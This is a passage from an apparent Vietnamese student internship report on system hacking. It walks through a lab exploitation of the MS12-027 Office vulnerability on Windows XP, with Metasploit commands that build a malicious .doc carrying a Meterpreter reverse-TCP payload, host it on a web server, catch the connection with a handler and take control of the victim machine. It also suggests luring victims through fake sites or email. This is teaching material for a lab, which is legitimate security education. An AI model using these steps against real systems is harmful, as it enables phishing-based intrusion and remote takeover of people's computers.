Khai thác lỗ hỏng Ms12-027

Một phần của tài liệu Báo cáo thực tập: System hacking (Trang 34 - 38)

4. Xâm nhập và khai thác Windows XP

4.4Khai thác lỗ hỏng Ms12-027

Mô tả:

Nguyên tắc khai thác lỗi ở đây khá đơn giản, bạn sẽ tạo ra một file mã độc có đuôi .doc và gửi cho nạn nhân, làm thế nào để nạn nhân nhận được và mở file có chứa mã độc đó lên (các bạn có thể tạo một web server giả mạo, dụ nạn nhân tải file đó về hoặc có thể gửi kèm theo mail, …) máy nạn nhân đang sử dụng Microsoft Office 2007 (no-SP/SP1/SP2/SP3) trên Windows (XP SP3 / 7 SP1) English là máy nạn nhân sẽ bị “nhiễm độc”.

Mô hình bài Lab

Máy Hacker: Hệ điều hành: Sử dụng Backtrack 5 IP: 192.168.119.132 Máy nạn nhân: Hệ điều hành: Sử dụng Windows XP IP: 192.168.119.129 Cách khai thác:

Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole Từ dấu nhắc sử dụng lệnh dưới để search mã lỗi trong msf msf > search ms12_027

System Hacking Athena Center

SVTH: Huỳnh Dương Khang Trang 35

msf > use exploit/windows/fileformat/ms12_027_mscomctl_bof Gõ lệnh show options để thấy những option của lỗi

msf exploit(ms12_027_mscomctl_bof) > show options

Ở đây ta thấy bắt buộc phải tạo FILENAME Lần lượt gõ các lệnh:

msf exploit(ms12_027_mscomctl_bof) > set filename filemadoc.doc

Ta sẽ thấy có một file filemadoc.doc được tạo ra (đây chỉ là ví dụ các bạn đặt tên theo ý mình thích)

msf exploit(ms12_027_mscomctl_bof) > set payload windows/meterpreter/reverse_tcp msf exploit(ms12_027_mscomctl_bof) > set LHOST 192.168.119.132

Địa chỉ này là địa chỉ IP của máy Hacker chính là máy BackTrack. msf exploit(ms12_027_mscomctl_bof) > exploit

Gõ lệnh exploit để thực thi

msf exploit(ms12_027_mscomctl_bof) > cp /root/.msf4/local/filemadoc.doc

/root/Desktop

SVTH: Huỳnh Dương Khang Trang 36 Vậy là việc tạo ra file chứa mã độc đã xong, giờ ta gửi file này cho nạn nhân để nạn nhân chạy file này là sẽ bị dính mã độc. Trong môi trường lab nên mình dựng luôn một Webserver để nạn nhân truy cập vào. Máy BackTrack đã hỗ trợ sẵn cho ta Webserver ta chỉ việc chạy.

Upload file “filemadoc.doc” lên Webserver bằng cách đưa nó vào thư mục “/var/www” Start Webserver ảo bằng lệnh

root@bt:~# service apache2 start

* Starting web server apache2 [ OK ] Tạo ra một trình lắng nghe

msf exploit(ms12_027_mscomctl_bof) > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.119.132

System Hacking Athena Center

SVTH: Huỳnh Dương Khang Trang 37

Giờ ta qua máy nạn nhân truy cập vào WEBSERVER ta đã dựng và tải file “filemadoc.doc” về.

Khi nạn nhân mở file lên thì mã độc sẽ được tiêm vào.

SVTH: Huỳnh Dương Khang Trang 38 Mã độc đã được tiêm từ máy 192.168.119.132:4444 tới máy 192.168.119.129:1040

Giờ ta có thể khai thác được máy nạn nhân

Gõ getuid để thấy thông tin username, getinfo để biết thông tin máy, ls C:\ để xem ổ đĩa, mkdir để tạo thư mục, … nói chung ta đã hoàn toàn kiểm xoát được máy nạn nhân

Một phần của tài liệu Báo cáo thực tập: System hacking (Trang 34 - 38)